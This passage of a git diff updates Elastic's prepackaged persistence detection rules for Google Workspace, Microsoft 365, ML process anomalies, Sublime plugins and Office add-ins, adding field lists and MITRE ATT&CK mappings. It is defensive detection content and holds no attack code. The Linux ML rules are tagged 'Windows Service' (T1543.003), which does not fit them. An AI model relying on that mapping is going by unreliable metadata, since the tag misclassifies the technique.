"version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_mfa_disabled_for_google_workspace_organization.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_mfa_disabled_for_google_workspace_organization.json new file mode 100644 index 0000000000000..d30f58a7ca9e2 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_mfa_disabled_for_google_workspace_organization.json @@ -0,0 +1,86 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects when multi-factor authentication (MFA) is disabled for a Google Workspace organization. An adversary may attempt to modify a password policy in order to weaken an organization\u2019s security controls.", + "false_positives": [ + "MFA settings may be modified by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-130m", + "index": [ + "filebeat-*", + "logs-google_workspace*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "MFA Disabled for Google Workspace Organization", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:(ENFORCE_STRONG_AUTHENTICATION or ALLOW_STRONG_AUTHENTICATION) and google_workspace.admin.new_value:false\n", + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "google_workspace.admin.new_value", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e555105c-ba6d-481f-82bb-9b633e7b4827", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Cloud", + "Google Workspace", + "Continuous Monitoring", + "SecOps", + "Identity and Access", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 15 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/microsoft_365_exchange_dkim_signing_config_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_exchange_dkim_signing_config_disabled.json similarity index 53% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/microsoft_365_exchange_dkim_signing_config_disabled.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_exchange_dkim_signing_config_disabled.json index 1b19f94bf898d..b4c103b079000 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/microsoft_365_exchange_dkim_signing_config_disabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_exchange_dkim_signing_config_disabled.json @@ -14,13 +14,52 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange DKIM Signing Configuration Disabled", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Set-DkimSigningConfig\" and o365.audit.Parameters.Enabled:False and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/set-dkimsigningconfig?view=exchange-ps" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.Enabled", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "514121ce-c7b6-474a-8237-68ff71672379", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -28,9 +67,27 @@ "Microsoft 365", "Continuous Monitoring", "SecOps", - "Data Protection" + "Data Protection", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_exchange_management_role_assignment.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_exchange_management_role_assignment.json index 832677a04f32b..41e96cb645554 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_exchange_management_role_assignment.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_exchange_management_role_assignment.json @@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Management Group Role Assignment", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-ManagementRoleAssignment\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/new-managementroleassignment?view=exchange-ps", "https://docs.microsoft.com/en-us/microsoft-365/admin/add-users/about-admin-roles?view=o365-worldwide" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "98995807-5b09-4e37-8a54-5cae5dc932d7", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_global_administrator_role_assign.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_global_administrator_role_assign.json index 06bdfe65d515c..af515210c0017 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_global_administrator_role_assign.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_global_administrator_role_assign.json @@ -11,13 +11,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Global Administrator Role Assigned", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.code:\"AzureActiveDirectory\" and event.action:\"Add member to role.\" and\no365.audit.ModifiedProperties.Role_DisplayName.NewValue:\"Global Administrator\"\n", "references": [ "https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#global-administrator" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.Role_DisplayName.NewValue", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "88671231-6626-4e1b-abb7-6e361a171fbb", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -43,7 +72,7 @@ "subtechnique": [ { "id": "T1098.003", - "name": "Add Office 365 Global Administrator Role", + "name": "Additional Cloud Roles", "reference": "https://attack.mitre.org/techniques/T1098/003/" } ] @@ -53,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/microsoft_365_teams_custom_app_interaction_allowed.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_custom_app_interaction_allowed.json similarity index 54% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/microsoft_365_teams_custom_app_interaction_allowed.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_custom_app_interaction_allowed.json index c2074329fb5ab..f25c04642d119 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/microsoft_365_teams_custom_app_interaction_allowed.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_custom_app_interaction_allowed.json @@ -14,13 +14,57 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Teams Custom Application Interaction Allowed", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:MicrosoftTeams and\nevent.category:web and event.action:TeamsTenantSettingChanged and\no365.audit.Name:\"Allow sideloading and interaction of custom apps\" and\no365.audit.NewValue:True and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/microsoftteams/platform/concepts/deploy-and-publish/apps-upload" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Name", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.NewValue", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "bbd1a775-8267-41fa-9232-20e5582596ac", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -28,9 +72,21 @@ "Microsoft 365", "Continuous Monitoring", "SecOps", - "Configuration Audit" + "Configuration Audit", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_external_access_enabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_external_access_enabled.json index c622572b8a796..b75e8339a78bb 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_external_access_enabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_external_access_enabled.json @@ -14,13 +14,52 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Teams External Access Enabled", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTenantFederationConfiguration\" and\no365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/microsoftteams/manage-external-access" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AllowFederatedUsers", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_guest_access_enabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_guest_access_enabled.json index 81af49294a639..82fdb6639ed7e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_guest_access_enabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_guest_access_enabled.json @@ -14,13 +14,52 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Teams Guest Access Enabled", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTeamsClientConfiguration\" and\no365.audit.Parameters.AllowGuestUser:True and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/skype/get-csteamsclientconfiguration?view=skype-ps" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AllowGuestUser", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "5e552599-ddec-4e14-bad1-28aa42404388", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_process_all_hosts.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_linux_anomalous_process_all_hosts.json similarity index 74% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_process_all_hosts.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_linux_anomalous_process_all_hosts.json index 76c8cd29fc8e8..f517465a110e5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_process_all_hosts.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_linux_anomalous_process_all_hosts.json @@ -26,8 +26,33 @@ "Host", "Linux", "Threat Detection", - "ML" + "ML", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_rare_process_by_host_linux.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_rare_process_by_host_linux.json similarity index 73% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_rare_process_by_host_linux.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_rare_process_by_host_linux.json index c873e6d7c1d8e..d9f78c5f76499 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_rare_process_by_host_linux.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_rare_process_by_host_linux.json @@ -26,8 +26,33 @@ "Host", "Linux", "Threat Detection", - "ML" + "ML", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_rare_process_by_host_windows.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_rare_process_by_host_windows.json similarity index 85% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_rare_process_by_host_windows.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_rare_process_by_host_windows.json index bf08c731bedd1..ac75504356320 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_rare_process_by_host_windows.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_rare_process_by_host_windows.json @@ -26,8 +26,33 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 11 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_path_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_path_activity.json similarity index 67% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_path_activity.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_path_activity.json index b7c80f05828e4..b913cd20ce1c2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_path_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_path_activity.json @@ -25,8 +25,33 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_process_all_hosts.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_process_all_hosts.json similarity index 85% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_process_all_hosts.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_process_all_hosts.json index fe7a5f2311f52..1b490f6231b67 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_process_all_hosts.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_process_all_hosts.json @@ -26,8 +26,26 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + } ], "type": "machine_learning", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_process_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_process_creation.json similarity index 77% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_process_creation.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_process_creation.json index 77dee22bcf35a..358c79a68999f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_process_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_process_creation.json @@ -25,8 +25,26 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + } ], "type": "machine_learning", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_service.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_service.json similarity index 61% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_service.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_service.json index bdc22e6bd8745..c96039edb1f30 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_service.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_service.json @@ -25,8 +25,33 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_modification_sublime_app_plugin_or_script.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_modification_sublime_app_plugin_or_script.json index 73987426827a8..f5f35e1261629 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_modification_sublime_app_plugin_or_script.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_modification_sublime_app_plugin_or_script.json @@ -11,13 +11,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Sublime Plugin or Application Script Modification", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type in (\"change\", \"creation\") and file.extension : \"py\" and\n file.path : \n (\n \"/Users/*/Library/Application Support/Sublime Text*/Packages/*.py\", \n \"/Applications/Sublime Text.app/Contents/MacOS/sublime.py\"\n ) and\n not process.executable : \n (\n \"/Applications/Sublime Text*.app/Contents/MacOS/Sublime Text*\", \n \"/usr/local/Cellar/git/*/bin/git\", \n \"/usr/libexec/xpcproxy\", \n \"/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Versions/A/Resources/DesktopServicesHelper\", \n \"/Applications/Sublime Text.app/Contents/MacOS/plugin_host\"\n )\n", + "note": "", + "query": "file where event.type in (\"change\", \"creation\") and file.extension : \"py\" and\n file.path :\n (\n \"/Users/*/Library/Application Support/Sublime Text*/Packages/*.py\",\n \"/Applications/Sublime Text.app/Contents/MacOS/sublime.py\"\n ) and\n not process.executable :\n (\n \"/Applications/Sublime Text*.app/Contents/*\",\n \"/usr/local/Cellar/git/*/bin/git\",\n \"/Library/Developer/CommandLineTools/usr/bin/git\",\n \"/usr/libexec/xpcproxy\",\n \"/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Versions/A/Resources/DesktopServicesHelper\"\n )\n", "references": [ "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "88817a33-60d3-411f-ba79-7c905d865b2a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -45,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ms_office_addins_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ms_office_addins_file.json index d01c80193d132..145af62c072e6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ms_office_addins_file.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ms_office_addins_file.json @@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Microsoft Office AddIns", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "file where event.type != \"deletion\" and\n file.extension : (\"wll\",\"xll\",\"ppa\",\"ppam\",\"xla\",\"xlam\") and\n file.path :\n (\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\Startup\\\\*\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\AddIns\\\\*\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel\\\\XLSTART\\\\*\"\n )\n", "references": [ "https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], 